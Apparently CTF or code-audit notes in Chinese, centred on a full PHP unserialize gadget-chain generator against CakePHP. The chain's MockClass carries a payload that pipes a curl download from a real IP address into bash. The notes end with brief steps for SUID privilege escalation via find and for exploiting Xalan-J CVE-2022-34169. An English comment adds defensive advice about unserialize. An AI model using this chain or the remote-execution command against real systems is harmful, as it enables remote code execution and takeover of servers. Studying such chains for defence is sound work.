代码审计 CakePHP 项目
https://github.com/cakephp/cakephp
新挖一条通杀任意代码执行的链子就可以
<?php
namespace PHPUnit\\Framework\\MockObject\\Generator;
use function call_user_func;
use function class_exists;
use PHPUnit\\Framework\\MockObject\\ConfigurableMethod;
final class MockClass
{
private string $mockName="J1rrY";
private string $classCode="system('curl 192.227.165.134 | bash');";
}
namespace JsonSchema\\Iterator;
class ObjectIterator
{
}
namespace Cake\\Collection\\Iterator;
use Cake\\Collection\\Collection;
use Cake\\Collection\\CollectionInterface;
use Cake\\Collection\\CollectionTrait;
use JsonSchema\\Iterator\\ObjectIterator;
use MultipleIterator;
class ZipIterator
{
protected MultipleIterator $multipleIterator;
public function __construct()
{
$this->multipleIterator=new ObjectIterator();
}
}
namespace Cake\\Command;
use Cake\\Console\\Arguments;
use Cake\\Console\\ConsoleIo;
use Cake\\Console\\ConsoleOptionParser;
use Cake\\Core\\Configure;
use function Cake\\Core\\env;
class ServerCommand
{
}
namespace PHPUnit\\Framework\\MockObject\\Stub;
use function call_user_func_array;
use PHPUnit\\Framework\\MockObject\\Invocation;
final class ReturnCallback
{
}
namespace Cake\\ORM;
use BadMethodCallException;
use Cake\\Collection\\Iterator\\ZipIterator;
use Cake\\Command\\ServerCommand;
use Cake\\Core\\App;
use Cake\\Core\\ObjectRegistry;
use Cake\\Event\\EventDispatcherInterface;
use Cake\\Event\\EventDispatcherTrait;
use Cake\\ORM\\Exception\\MissingBehaviorException;
use Cake\\ORM\\Query\\SelectQuery;
use LogicException;
use PHPUnit\\Framework\\MockObject\\Generator\\MockClass;
use PHPUnit\\Framework\\MockObject\\Stub\\ReturnCallback;
class BehaviorRegistry
{
protected array $_methodMap = [];
protected array $_loaded = [];
public function __construct()
{
$this->_methodMap=["getname"=>["_","generate"]];
$this->_loaded=["_"=>new MockClass()];
}
}
namespace Cake\\ORM;
use ArrayObject;
use Cake\\Collection\\CollectionInterface;
use Cake\\Core\\Configure;
use Cake\\Core\\Exception\\CakeException;
use Cake\\Database\\Connection;
use Cake\\Database\\Exception\\DatabaseException;
use Cake\\Database\\Expression\\QueryExpression;
use Cake\\Database\\Schema\\TableSchemaInterface;
use Cake\\Database\\TypeFactory;
use Cake\\Datasource\\ConnectionManager;
use Cake\\Datasource\\EntityInterface;
use Cake\\Datasource\\Exception\\InvalidPrimaryKeyException;
use Cake\\Datasource\\RepositoryInterface;
use Cake\\Datasource\\RulesAwareTrait;
use Cake\\Event\\EventListenerInterface;
use Cake\\Event\\EventManager;
use Cake\\ORM\\Association\\BelongsTo;
use Cake\\ORM\\Association\\BelongsToMany;
use Cake\\ORM\\Association\\HasMany;
use Cake\\ORM\\Association\\HasOne;
use Cake\\ORM\\Exception\\MissingEntityException;
use Cake\\ORM\\Exception\\PersistenceFailedException;
use Cake\\ORM\\Exception\\RolledbackTransactionException;
use Cake\\ORM\\Query\\DeleteQuery;
use Cake\\ORM\\Query\\InsertQuery;
use Cake\\ORM\\Query\\QueryFactory;
use Cake\\ORM\\Query\\UpdateQuery;
use Cake\\ORM\\Rule\\IsUnique;
use Cake\\Utility\\Inflector;
use Cake\\Validation\\ValidatorAwareInterface;
use Cake\\Validation\\ValidatorAwareTrait;
use Closure;
use Exception;
use InvalidArgumentException;
use Psr\\SimpleCache\\CacheInterface;
use ReflectionFunction;
use ReflectionNamedType;
use function Cake\\Core\\deprecationWarning;
use function Cake\\Core\\namespaceSplit;
class Table
{
protected BehaviorRegistry $_behaviors;
public function __construct()
{
$this->_behaviors=new BehaviorRegistry();
}
}
namespace Cake\\Http\\Cookie;
use ArrayIterator;
use Cake\\ORM\\Table;
use Countable;
use DateTimeImmutable;
use DateTimeZone;
use Detection\\MobileDetect;
use Exception;
use InvalidArgumentException;
use IteratorAggregate;
use Psr\\Http\\Message\\RequestInterface;
use Psr\\Http\\Message\\ResponseInterface;
use Psr\\Http\\Message\\ServerRequestInterface;
use Traversable;
use TypeError;
use function Cake\\Core\\triggerWarning;
class CookieCollection
{
protected array $cookies = [];
public function __construct()
{
$this->cookies=[new Table()];
}
}
namespace Composer\\DependencyResolver;
use Cake\\Http\\Cookie\\CookieCollection;
use Composer\\Package\\BasePackage;
use Composer\\Package\\Version\\VersionParser;
use Composer\\Semver\\CompilingMatcher;
use Composer\\Semver\\Constraint\\ConstraintInterface;
use Composer\\Semver\\Constraint\\Constraint;
class Pool
{
protected $packages = [];
public function __construct()
{
$this->packages=[new CookieCollection()];
}
}
namespace React\\Promise\\Internal;
use Composer\\DependencyResolver\\Pool;
use React\\Promise\\PromiseInterface;
use function React\\Promise\\_checkTypehint;
use function React\\Promise\\resolve;
use function React\\Promise\\set_rejection_handler;
final class RejectedPromise
{
private $reason;
public function __construct()
{
$this->reason=new Pool();
}
}
//J1rrY
// Emits the base64-encoded serialize() output of the object graph rooted at
// RejectedPromise (-> Pool -> CookieCollection -> Table -> BehaviorRegistry -> MockClass).
// serialize() records only class names and property values; none of the stub
// classes declared above ship any behaviour. Whatever behaviour results is that
// of the same-named classes in the application that later calls unserialize()
// on these bytes. Because the graph spans React\Promise, Composer\DependencyResolver,
// Cake\ORM, Cake\Http\Cookie and PHPUnit\Framework\MockObject, it is only
// reachable where all of those packages are autoloadable at runtime - i.e. a
// deployment that still has dev/tooling dependencies installed.
// Defensive baseline: never unserialize() untrusted input; prefer json_decode(),
// or at minimum unserialize($data, ['allowed_classes' => false]) / an explicit
// allow-list, and keep dev dependencies out of production autoloaders.
echo(base64_encode(serialize(new RejectedPromise())));
弹上去后有一个suid提权 直接find命令提权即可
注意是xalan 依赖 版本是 2.7.2
存在历史漏洞
Java 版本1.8.0.192
找到这个CVE,找项目直接打
https://alter1125.github.io/2023/02/19/Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)学习与扩展/#CheckList
但是直接打报错null,找到问题了,黑名单之后的问题在于他把我们传入的文件名进行了修改为null4位,但是项目给出的生成的文件都是6位的,
select -> abcdef
.class
文件(文件内容发生变动则不用)Xalan-J XSLT整数截断漏洞利用构造(CVE-2022-34169)
直接用这个师傅的github项目就能打,注意获取文件名设定为6位,filename是参数获取单独传参